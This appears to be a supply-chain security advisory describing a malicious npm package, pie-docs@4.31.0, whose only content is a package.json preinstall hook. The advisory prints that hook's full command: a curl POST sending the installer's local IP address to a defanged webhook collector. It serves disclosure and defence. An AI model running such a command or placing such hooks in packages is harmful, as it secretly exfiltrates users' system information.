LWA-2026-4570 confirmed malware

pie-docs@4.31.0

Malicious code in pie-docs (npm)

T1059.004 · Unix ShellT1082 · System Information DiscoveryT1041 · Exfiltration Over C2 Channel

Analysis

A metadata-only attack package masquerading as a documentation module: the tarball is only 372 bytes and ships nothing but a package.json with a malicious preinstall hook. On install the hook runs `/usr/bin/curl --data "ip=$(sh -c 'hostname -I')" hxxps://webhook-test[.]com/0c3ba7837882ab803c265c52e2dd8cea`, collecting the installer's local IP address and exfiltrating it via HTTP POST to a collector endpoint.

analyzed by
Leitwacht
first seen
Jun 12, 2026, 07:38 AM
analyzed
Jun 12, 2026, 07:40 AM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.